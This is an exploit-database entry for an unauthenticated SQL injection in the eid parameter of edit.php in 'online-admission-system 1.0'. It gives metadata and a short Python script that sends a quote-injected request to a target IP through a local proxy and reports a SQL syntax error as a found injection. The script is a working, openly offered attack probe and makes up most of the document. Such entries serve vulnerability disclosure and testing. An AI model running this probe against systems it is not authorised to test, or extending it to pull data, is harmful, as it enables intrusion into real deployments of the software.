Share
## https://sploitus.com/exploit?id=1337DAY-ID-37892
# Exploit Title: online-admission-system  1.0 - unauthenticated SQL Injection
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A

# Description 
# The eid parameter does not perform input validation on the edit.php file it allow unauthenticated SQL Injection


import requests
import sys

proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}

def send_request(ip):
    x = "http://%s/Student-Admission_0/Student-Admission/?a=edit&eid=8'" %ip
    z = requests.get(x,proxies=proxies)
    if "You have an error in your SQL syntax" in z.text:
        print("[+] Found Sql Injection")
    

if __name__ == "__main__":
    try:
        ip = sys.argv[1].strip()
        
    except IndexError:
        print("[-] Usage %s <ip>" % sys.argv[0])
        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])
        sys.exit(-1)

send_request(ip)